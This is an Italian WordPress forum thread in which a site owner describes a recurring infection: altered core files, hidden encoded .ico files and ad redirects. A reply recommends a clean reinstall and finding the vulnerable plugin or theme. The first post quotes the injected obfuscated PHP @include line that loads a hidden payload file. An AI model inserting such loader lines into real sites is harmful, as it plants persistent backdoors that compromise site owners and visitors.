Sito violato, file modificati, cartelle create

[egidiogelli]

Salve a tutti,
sono nuovo nel forum, utilizzo wordpress da alcuni anni.
Ho riscontrato un Enorme problema in un sito web che gestisco, vi elenco i problemi, ovvero sicuramente malware:

nella root principale dove ci sono cartelle e file, alcuni file esempio:
index.php
wp-config.php
wp-settings.php
etc...
sono stati modificati, ovvero all'interno del file, sono state aggiunte queste righe di codice:

/*d9507*/
@include "\057ho\155e/\160ed\141le\164ri\143ol\157re\057pu\142li\143_h\164ml\057wp\055in\143lu\144es\057bl\157ck\163/c\141le\156da\162/.\142cf\142c0\1428.\151co";
/*d9507*/

poi sono state create delle cartelle, con nomi strani, all'interno c'è un file denominato index.php il codice molto strano, direi codificato...
`

poi, ho trovato a giro, altri file con nomi strani tipo:
.3bddbb29.ico
il suo contenuto è è sempre cittografato, quindi impossibile presumo da leggere...


insomma quando apro il sito, vengono mostrate pubblicità e ovviamente non compare più il sito, ovviamente ho già provveduto a cancellare i file, modificare i file etc, ma puntualmente ogni tot tempo, tipo ogni 2 giorni massimo, questi ricompaiono.
Ho cancellato e disabilitato temi e plugin, ma niente è cambiato.
Ovviamente ho il sito aggiornato.

Cosa posso fare?
Grazie

 

[glm1986ITALY]

Si, il sito è hackerato, bisogna bonificare totalmente il sito.

In parole povere bisogna eliminare TUTTI i file ricreando da zero l' installazione salvando solo gli upload (che andranno comunque verificati) e il database.

Ovviamente bisogna anche individuare la causa, il più delle volte il tema o qualche plugin obsoleto non aggiornato.